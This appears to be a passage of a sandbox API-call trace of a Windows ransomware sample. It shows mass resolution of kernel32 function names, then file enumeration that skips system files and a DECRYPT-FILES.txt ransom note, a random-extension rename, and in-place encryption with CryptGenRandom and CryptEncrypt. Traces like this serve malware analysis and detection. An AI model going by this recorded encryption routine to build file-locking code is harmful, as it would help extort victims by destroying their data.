lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.276] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.276] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.276] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.276] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.276] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.276] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.276] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.276] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.276] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.276] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.276] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.276] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.276] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.276] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.276] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.276] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.277] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.277] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.277] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.277] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.277] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.277] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.277] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.277] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.277] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.277] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.277] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.277] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.277] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.277] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.277] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.277] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.277] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.277] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.277] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.278] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.278] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.278] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.278] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.278] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.278] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.278] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.278] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.278] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.278] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.278] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.278] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.278] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.282] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.282] lstrlenA (lpString="DELETEATOM") returned 10 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.282] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.282] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.282] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.282] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.282] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.282] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.282] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.282] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.282] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.282] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.282] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.283] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.283] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.283] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.283] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.283] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.283] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.283] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.283] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.283] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.283] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.283] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.283] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.283] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.283] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.283] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.283] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.283] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.283] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.283] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.284] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.284] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.284] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.284] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.284] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.284] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.284] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.284] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.284] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.284] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.284] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.284] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv") returned 72 [0087.284] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv.GfU8yS") returned 79 [0087.284] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\60wq6b0lwarhmx.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv.GfU8yS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\60wq6b0lwarhmx.flv.gfu8ys"), dwFlags=0x0) returned 1 [0087.285] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.285] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.286] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.286] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c72710, ftCreationTime.dwHighDateTime=0x1d4ced8, ftLastAccessTime.dwLowDateTime=0xc9b0130, ftLastAccessTime.dwHighDateTime=0x1d4d4ae, ftLastWriteTime.dwLowDateTime=0xc9b0130, ftLastWriteTime.dwHighDateTime=0x1d4d4ae, nFileSizeHigh=0x0, nFileSizeLow=0x15b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ajO4XvEv4yYsIs837v.swf", cAlternateFileName="AJO4XV~1.SWF")) returned 1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="DECRYPT-FILES.txt") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="autorun.inf") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="boot.ini") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="desktop.ini") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="ntuser.dat") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="iconcache.db") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="bootsect.bak") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="ntuser.dat.log") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="thumbs.db") returned -1 [0087.286] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf", lpString2="Bootfont.bin") returned -1 [0087.286] lstrlenW (lpString="ajO4XvEv4yYsIs837v.swf") returned 22 [0087.286] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0087.286] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0087.286] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0087.286] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0087.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.286] lstrlenW (lpString="ajO4XvEv4yYsIs837v.swf") returned 22 [0087.286] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.286] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="ajO4XvEv4yYsIs837v.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf" [0087.286] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ajo4xvev4yysis837v.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.287] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=5556) returned 1 [0087.287] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.287] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.287] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.287] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.287] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.287] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.288] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.288] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.288] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.289] CloseHandle (hObject=0x42c) returned 1 [0087.289] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.289] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.289] CloseHandle (hObject=0x0) returned 0 [0087.289] CloseHandle (hObject=0x428) returned 1 [0087.289] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.290] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.290] GetTickCount () returned 0x114e447 [0087.290] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.290] lstrlenW 